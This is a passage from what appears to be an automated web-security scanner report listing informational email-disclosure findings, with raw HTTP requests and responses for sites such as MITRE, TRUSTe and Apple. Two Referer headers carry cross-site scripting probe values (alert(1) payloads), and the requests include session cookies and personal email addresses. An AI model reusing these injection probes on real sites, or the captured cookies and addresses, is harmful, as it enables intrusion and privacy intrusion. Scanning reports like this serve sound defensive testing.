User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; human_user=true; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 18:13:32 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 12:43:38 GMT
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 31 Jan 2021 18:13:32 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 5915
Connection: keep-alive
Content-Length: 60142

var loginRegExp=/^[a-z0-9_]+$/i;
var emailRegExp=/^[0-9a-z_\.-]+\@[0-9a-z\.-]+\.[a-z]{2,3}$/i;
var googleAdClientRegExp=/^[a-z0-9-]+$/i;
var googleAdChannelRegExp=/^[a-z0-9-]{3,10}$/i;
var site
...[SNIP]...

if(formObj[email].value == '') {
alert('\'e-mail\' should be not empty');
return false;
} else if(!emailRegExp.test(formObj[email].value)) {
alert('Sorry, \'e-mail\' incorrect, it should be like mymail@host.com');
return false;
} else {
return true;
/*
formObj.submit();
*/
}
}

function mySubscriptionSubmit(event,is_logged_on,formObj,subscriptionType,email,loginType,enableValidate,enableSubscription
...[SNIP]...
('\'e-mail\' should be not empty');
return false;
} else if(typeof(formObj[email]) != 'undefined' && !emailRegExp.test(formObj[email].value)) {
alert('Sorry, \'e-mail\' incorrect, it should be like mymail@host.com');
return false;
} else if(
mode == 'signup' &&
formObj[site].value != '' &&
!siteUrlRegExp.test(formObj[site].value)
) {
alert('Sorry, \'site\' incorrect, it should be like mysite.com');
ret
...[SNIP]...
');
}
else if(
typeof(formObj[email]) != 'undefined' &&
(
formObj[email].value == '' ||
!emailRegExp.test(formObj[email].value)
)
)
{
alert('Sorry, \'e-mail\' incorrect, it should be like mymail@host.com');
} else if(
typeof(formObj[oldsite]) != 'undefined' &&
typeof(formObj[site]) != 'undefined' &&
formObj[oldsite].value != formObj[site].value &&
!siteUrlRegExp.test(formObj[site].value)
)
{

...[SNIP]...

23.5. http://boardreader.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /opensearch.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /opensearch.xml HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; human_user=true; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmb=69622787; __utmc=69622787

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 13 Apr 2009 05:51:55 GMT
Accept-Ranges: bytes
Content-Length: 1627
Content-Type: text/xml
Warning: 113 WEB04.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 web05.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 WEB04.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 web05.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 WEB04.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 web05.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 WEB04.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 web05.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Warning: 113 WEB04.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Date: Thu, 03 Feb 2011 19:49:50 GMT
Server: Apache
Age: 118028
Warning: 113 web05.boardreader.com (squid) This cache hit is still fresh and more than 1 day old
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<!-- Created on Wed, 03 Jan 2007 2
...[SNIP]...
<Contact>spurdon@boardreader.com</Contact>
...[SNIP]...

23.6. http://capec.mitre.org/data/definitions/19.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capec.mitre.org
Path:   /data/definitions/19.html

Issue detail

The following email address was disclosed in the response:

Request

GET /data/definitions/19.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: capec.mitre.org
Cookie: __utma=176404535.361489775.1296759699.1296759699.1296759699.1; __utmz=176404535.1296759699.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176404535

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 01:47:36 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 58132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<h
...[SNIP]...
<a href="mailto:capec@mitre.org">
...[SNIP]...
<a title="Contact CAPEC" href="mailto:capec@mitre.org">capec@mitre.org</a>
...[SNIP]...
<a href="mailto:capec@mitre.org">
...[SNIP]...

23.7. http://cdn.taboolasyndication.com/libtrc/veoh/rbox.en.4-6-1-43135.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/veoh/rbox.en.4-6-1-43135.json

Issue detail

The following email address was disclosed in the response:

Request

GET /libtrc/veoh/rbox.en.4-6-1-43135.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Feb 2011 10:54:54 GMT
ETag: "1628221-284-49b5e9876db80"
Accept-Ranges: bytes
Content-Length: 644
Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 34909
Expires: Fri, 03 Feb 2012 11:10:40 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
<info@taboola.com>
...[SNIP]...

23.8. http://clicktoverify.truste.com/common/css/validate2_1.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /common/css/validate2_1.css

Issue detail

The following email address was disclosed in the response:

Request

GET /common/css/validate2_1.css HTTP/1.1
Accept: */*
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: clicktoverify.truste.com

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:47 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Fri, 14 Jan 2011 01:47:06 GMT
ETag: "7f8011-182d-9c8d7a80"
Accept-Ranges: bytes
Content-Length: 6189
Content-Type: text/css

@charset "utf-8";
/*
TRUSTe
Title: Validate CSS
Date: May 2009
Website: http://www.truste.com/
Author: Pasquale Scerbo (pscerbo@extractable.com)
*/


/*----------------- CSS NORMALIZER -----------------*/
/*
- cancels default styles applied to page elements
- adjusts default elements between browsers to same baseline
*/

div, dl, dt, dd, ul,
...[SNIP]...

23.9. http://clicktoverify.truste.com/css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /css/styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/styles.css HTTP/1.1
Accept: */*
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: clicktoverify.truste.com

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 13 Jan 2011 18:58:04 GMT
ETag: "81c021-a26e-e5bc4700"
Accept-Ranges: bytes
Content-Length: 41582
Content-Type: text/css

@charset "utf-8";
/*
TRUSTe
Title: Default CSS
Date: May/June 2009
Website: http://www.truste.com/
Author: Pasquale Scerbo (pscerbo@extractable.com)
*/


/*----------------- CSS NORMALIZER -----------------*/
/*
- cancels default styles applied to page elements
- adjusts default elements between browsers to same baseline
*/

div, dl, dt
...[SNIP]...

23.10. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following email address was disclosed in the response:

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cb6b836b6760c3ac:TM=1296765128:LM=1296765128:S=HgS2nFLrqCV4X1Jh; expires=Sat, 02-Feb-2013 20:32:08 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
<a style="white-space: nowrap" href="/u/@WBRURlVTAhdC/">TenSafeF...@gmail.com</a>
...[SNIP]...

23.11. http://cwe.mitre.org/data/definitions/79.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cwe.mitre.org
Path:   /data/definitions/79.html

Issue detail

The following email address was disclosed in the response:

Request

GET /data/definitions/79.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: cwe.mitre.org
Cookie: __utma=79487238.246893552.1294711613.1294711613.1294711613.1; __utmz=79487238.1294711613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 01:47:42 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 85128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<h
...[SNIP]...
<a href="mailto:cwe@mitre.org">
...[SNIP]...
<a title="Contact CWE" href="mailto:cwe@mitre.org">cwe@mitre.org</a>
...[SNIP]...
<a href="mailto:cwe@mitre.org">
...[SNIP]...

23.12. http://cwe.mitre.org/includes/glossarydef.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cwe.mitre.org
Path:   /includes/glossarydef.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/glossarydef.js HTTP/1.1
Accept: */*
Referer: http://cwe.mitre.org/data/definitions/79.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: cwe.mitre.org
Proxy-Connection: Keep-Alive
Cookie: __utma=79487238.246893552.1294711613.1294711613.1294711613.1; __utmz=79487238.1294711613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:47:44 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 13096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1
...[SNIP]...
<a href="mailto:cwe@mitre.org">
...[SNIP]...
<a title="Contact CWE" href="mailto:cwe@mitre.org">cwe@mitre.org</a>
...[SNIP]...
<a href="mailto:cwe@mitre.org">
...[SNIP]...

23.13. http://dean.edwards.name/weblog/2006/03/base/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /weblog/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:54 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Thu, 03 Feb 2011 19:48:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176038

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<a href="mailto:sam@conio.net">sam@conio.net</a>, MIT-style license -Belgelendirme Aaron Newton(aaron.newton@cnet.com) and Valerio Proietti taraf..ndan yap..lm....t..r. [...]</p>
...[SNIP]...

23.14. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17

Issue detail

The following email address was disclosed in the response:

Request

GET /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17 HTTP/1.1
Host: iforgot.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:58:57 GMT
Server: Apache
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Wed, 26-Jan-2011 08:15:31 GMT
pragma: no-cache
connection: close
content-length: 14219
Content-Type: text/html; charset=utf-8


   <!DOCTYPE html>
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
   <head>
       
   <noscript>
       <META HTTP-EQUIV="Refresh" CONTENT="0;URL=/cgi-bin/WebObjects/DSiForgot.woa/134/wa
...[SNIP]...
<input placeholder="example: jappleseed@me.com" id="current-email" title="Email" type="text" name="email1_101" />
...[SNIP]...

23.15. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7

Issue detail

The following email address was disclosed in the response:

Request

GET /cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7 HTTP/1.1
Host: iforgot.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:58:56 GMT
Server: Apache
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Wed, 26-Jan-2011 08:15:31 GMT
pragma: no-cache
connection: close
content-length: 14219
Content-Type: text/html; charset=utf-8


   <!DOCTYPE html>
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
   <head>
       
   <noscript>
       <META HTTP-EQUIV="Refresh" CONTENT="0;URL=/cgi-bin/WebObjects/DSiForgot.woa/134/wa
...[SNIP]...
<input placeholder="example: jappleseed@me.com" id="current-email" title="Email" type="text" name="email1_101" />
...[SNIP]...

23.16. https://iforgot.apple.com/myappleid/global/scripts/lib/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iforgot.apple.com
Path:   /myappleid/global/scripts/lib/scriptaculous.js

Issue detail

The following email address was disclosed in the response:

Request

GET /myappleid/global/scripts/lib/scriptaculous.js HTTP/1.1
Host: iforgot.apple.com
Connection: keep-alive
Referer: https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/wa/iforgot?language=US-EN&app_id=2989&returnURL=https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0&newWindow=true&border=false
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:57:57 GMT
Server: Apache
Last-Modified: Tue, 04 May 2010 06:27:23 GMT
ETag: "ab17-1cf45-485becd63e8c0"
Accept-Ranges: bytes
Content-Length: 118597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

// script.aculo.us scriptaculous.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, f
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

23.17. http://images.apple.com/global/scripts/lib/event_mixins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/event_mixins.js

Issue detail

The following email address was disclosed in the response:

Request

GET /global/scripts/lib/event_mixins.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/ipad/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
